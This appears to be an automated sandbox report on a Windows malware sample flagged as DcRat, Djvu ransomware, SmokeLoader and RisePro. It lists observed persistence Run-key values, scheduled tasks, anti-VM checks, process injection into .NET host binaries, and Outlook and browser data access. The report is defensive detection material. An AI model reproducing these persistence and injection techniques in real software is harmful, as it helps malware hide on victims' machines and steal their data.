Malware Analysis Report

2025-01-02 03:50

Sample ID 231211-m4z41sebf8
Target 6c259995bee7f47475c57128bef3da05d5eb87d0fde658488e85ac0e0aa2fb8d
SHA256 6c259995bee7f47475c57128bef3da05d5eb87d0fde658488e85ac0e0aa2fb8d
Tags
dcrat djvu privateloader risepro smokeloader zgrat pu10 backdoor paypal collection discovery evasion infostealer loader persistence phishing ransomware rat spyware stealer themida trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

6c259995bee7f47475c57128bef3da05d5eb87d0fde658488e85ac0e0aa2fb8d

Threat Level: Known bad

The file 6c259995bee7f47475c57128bef3da05d5eb87d0fde658488e85ac0e0aa2fb8d was found to be: Known bad.

Malicious Activity Summary

dcrat djvu privateloader risepro smokeloader zgrat pu10 backdoor paypal collection discovery evasion infostealer loader persistence phishing ransomware rat spyware stealer themida trojan

DcRat

ZGRat

RisePro

Detected Djvu ransomware

PrivateLoader

SmokeLoader

Djvu Ransomware

Detect ZGRat V1

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Downloads MZ/PE file

Modifies file permissions

Checks BIOS information in registry

Reads user/profile data of web browsers

Reads user/profile data of local email clients

Checks computer location settings

Executes dropped EXE

Drops startup file

Themida packer

.NET Reactor proctector

Deletes itself

Adds Run key to start application

Checks installed software on the system

Accesses cryptocurrency files/wallets, possible credential harvesting

Looks up external IP address via web service

Accesses Microsoft Outlook profiles

Checks whether UAC is enabled

AutoIT Executable

Drops file in System32 directory

Suspicious use of SetThreadContext

Detected potential entity reuse from brand paypal.

Suspicious use of NtSetInformationThreadHideFromDebugger

Program crash

Enumerates physical storage devices

Unsigned PE

Checks SCSI registry key(s)

outlook_office_path

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Enumerates system info in registry

Checks processor information in registry

Creates scheduled task(s)

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

Suspicious use of SendNotifyMessage

outlook_win_path

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-12-11 11:01

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-12-11 11:01

Reported

2023-12-11 11:04

Platform

win10v2004-20231201-en

Max time kernel

150s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6c259995bee7f47475c57128bef3da05d5eb87d0fde658488e85ac0e0aa2fb8d.exe"

Signatures

DcRat

rat infostealer dcrat
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\6c259995bee7f47475c57128bef3da05d5eb87d0fde658488e85ac0e0aa2fb8d.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2192493100-457715857-1189582111-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\0c74d987-e07e-499b-b0eb-21eaa09fb6b6\\C025.exe\" --AutoStart" C:\Users\Admin\AppData\Local\Temp\C025.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detected Djvu ransomware

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Djvu Ransomware

ransomware djvu

PrivateLoader

loader privateloader

RisePro

stealer risepro

SmokeLoader

trojan backdoor smokeloader

ZGRat

rat zgrat

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\A818.exe N/A

Downloads MZ/PE file

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\A818.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\A818.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2192493100-457715857-1189582111-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\C025.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FANBooster131.lnk C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1dm70bp2.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2192493100-457715857-1189582111-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1dm70bp2.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2192493100-457715857-1189582111-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1dm70bp2.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2192493100-457715857-1189582111-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1dm70bp2.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2192493100-457715857-1189582111-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\0c74d987-e07e-499b-b0eb-21eaa09fb6b6\\C025.exe\" --AutoStart" C:\Users\Admin\AppData\Local\Temp\C025.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\6205.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wc0LF94.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2192493100-457715857-1189582111-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MaxLoonaFest131 = "C:\\Users\\Admin\\AppData\\Local\\MaxLoonaFest131\\MaxLoonaFest131.exe" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1dm70bp2.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\A818.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Detected potential entity reuse from brand paypal.

phishing paypal

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1dm70bp2.exe N/A
File opened for modification C:\Windows\SysWOW64\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1dm70bp2.exe N/A
File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1dm70bp2.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1dm70bp2.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\A818.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4820 set thread context of 1440 N/A C:\Users\Admin\AppData\Local\Temp\6c259995bee7f47475c57128bef3da05d5eb87d0fde658488e85ac0e0aa2fb8d.exe C:\Users\Admin\AppData\Local\Temp\6c259995bee7f47475c57128bef3da05d5eb87d0fde658488e85ac0e0aa2fb8d.exe
PID 3008 set thread context of 4240 N/A C:\Users\Admin\AppData\Local\Temp\C025.exe C:\Users\Admin\AppData\Local\Temp\C025.exe
PID 3752 set thread context of 3856 N/A C:\Users\Admin\AppData\Local\Temp\C025.exe C:\Users\Admin\AppData\Local\Temp\C025.exe
PID 800 set thread context of 4184 N/A C:\Users\Admin\AppData\Local\Temp\C835.exe C:\Users\Admin\AppData\Local\Temp\C835.exe
PID 752 set thread context of 5052 N/A C:\Users\Admin\AppData\Local\AceFlags\yafqg\ContextProperties.exe C:\Users\Admin\AppData\Local\AceFlags\yafqg\ContextProperties.exe
PID 5052 set thread context of 7500 N/A C:\Users\Admin\AppData\Local\AceFlags\yafqg\ContextProperties.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
PID 7500 set thread context of 5052 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
PID 7372 set thread context of 7568 N/A C:\Users\Admin\AppData\Local\Temp\tclviqkxt.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
PID 7568 set thread context of 5196 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
PID 7568 set thread context of 1796 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4CW110XU.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4CW110XU.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\6c259995bee7f47475c57128bef3da05d5eb87d0fde658488e85ac0e0aa2fb8d.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\6c259995bee7f47475c57128bef3da05d5eb87d0fde658488e85ac0e0aa2fb8d.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\6c259995bee7f47475c57128bef3da05d5eb87d0fde658488e85ac0e0aa2fb8d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4CW110XU.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1dm70bp2.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1dm70bp2.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\6c259995bee7f47475c57128bef3da05d5eb87d0fde658488e85ac0e0aa2fb8d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6c259995bee7f47475c57128bef3da05d5eb87d0fde658488e85ac0e0aa2fb8d.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\C835.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\C835.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\704E.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\AceFlags\yafqg\ContextProperties.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\AceFlags\yafqg\ContextProperties.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\tclviqkxt.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6Pv3II0.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6Pv3II0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6Pv3II0.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6Pv3II0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6Pv3II0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6Pv3II0.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6Pv3II0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6Pv3II0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6Pv3II0.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6Pv3II0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6Pv3II0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6Pv3II0.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4820 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\6c259995bee7f47475c57128bef3da05d5eb87d0fde658488e85ac0e0aa2fb8d.exe C:\Users\Admin\AppData\Local\Temp\6c259995bee7f47475c57128bef3da05d5eb87d0fde658488e85ac0e0aa2fb8d.exe
PID 4820 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\6c259995bee7f47475c57128bef3da05d5eb87d0fde658488e85ac0e0aa2fb8d.exe C:\Users\Admin\AppData\Local\Temp\6c259995bee7f47475c57128bef3da05d5eb87d0fde658488e85ac0e0aa2fb8d.exe
PID 4820 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\6c259995bee7f47475c57128bef3da05d5eb87d0fde658488e85ac0e0aa2fb8d.exe C:\Users\Admin\AppData\Local\Temp\6c259995bee7f47475c57128bef3da05d5eb87d0fde658488e85ac0e0aa2fb8d.exe
PID 4820 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\6c259995bee7f47475c57128bef3da05d5eb87d0fde658488e85ac0e0aa2fb8d.exe C:\Users\Admin\AppData\Local\Temp\6c259995bee7f47475c57128bef3da05d5eb87d0fde658488e85ac0e0aa2fb8d.exe
PID 4820 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\6c259995bee7f47475c57128bef3da05d5eb87d0fde658488e85ac0e0aa2fb8d.exe C:\Users\Admin\AppData\Local\Temp\6c259995bee7f47475c57128bef3da05d5eb87d0fde658488e85ac0e0aa2fb8d.exe
PID 4820 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\6c259995bee7f47475c57128bef3da05d5eb87d0fde658488e85ac0e0aa2fb8d.exe C:\Users\Admin\AppData\Local\Temp\6c259995bee7f47475c57128bef3da05d5eb87d0fde658488e85ac0e0aa2fb8d.exe
PID 3600 wrote to memory of 980 N/A N/A C:\Windows\system32\cmd.exe
PID 3600 wrote to memory of 980 N/A N/A C:\Windows\system32\cmd.exe
PID 980 wrote to memory of 3608 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
